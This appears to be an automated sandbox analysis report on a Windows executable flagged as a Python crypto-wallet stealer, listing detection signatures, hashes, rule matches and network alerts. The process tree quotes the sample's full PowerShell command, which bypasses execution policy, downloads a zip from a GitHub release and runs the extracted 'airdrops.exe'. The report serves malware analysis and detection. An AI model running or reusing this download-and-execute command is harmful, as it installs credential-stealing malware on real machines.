Windows
Analysis Report
file.exe
Overview
General Information
Detection
Python Stealer
Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Bypasses PowerShell execution policy
Creates files with lurking names (e.g. Crack.exe)
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Powershell drops PE file
Sigma detected: Powerup Write Hijack DLL
Suspicious powershell command line found
Yara detected Generic Python Stealer
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- file.exe (PID: 6504, cmdline: "C:\Users\user\Desktop\file.exe", MD5: 1CA29F32C02F847A6A2CE55775F92A8E)
- powershell.exe (PID: 4592, cmdline: powershell.exe -Command "Set-ExecutionPolicy Bypass -Scope Process -Force; Invoke-WebRequest -Uri 'https://github.com/directuser/mnemonic-checker/releases/download/1/airdrops.zip' -OutFile \"$env:APPDATA\\file.zip\"; Expand-Archive -Path \"$env:APPDATA\\file.zip\" -DestinationPath \"$env:APPDATA\\extracted\"; Remove-Item -Path \"$env:APPDATA\\file.zip\"; Start-Process \"$env:APPDATA\\extracted\\airdrops.exe\"", MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 7092, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- airdrops.exe (PID: 3628, cmdline: "C:\Users\user\AppData\Roaming\extracted\airdrops.exe", MD5: 1188DC1186CAFDBCAC6A8C6B02BE4841)
- cleanup
No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_GenericPythonStealer | Yara detected Generic Python Stealer | Joe Security | |
System Summary (Sigma rule matches)
- Author: Subhash Popuri (@pbssubhash)
- Author: frack113
- Author: frack113, Nasreddine Bencherchali (Nextron Systems)
- Author: Florian Roth (Nextron Systems)
- Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger
- Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-28T20:08:42.278181+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49820 | 13.107.246.63 | 443 | TCP |
2024-11-28T20:08:42.317174+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49819 | 13.107.246.63 | 443 | TCP |
AV Detection
- Source: Joe Sandbox ML
- Source: Static PE information
- Source: File created
- Source: HTTPS traffic detected (2 entries)
- Source: Static PE information
- Source: Binary string (9 entries)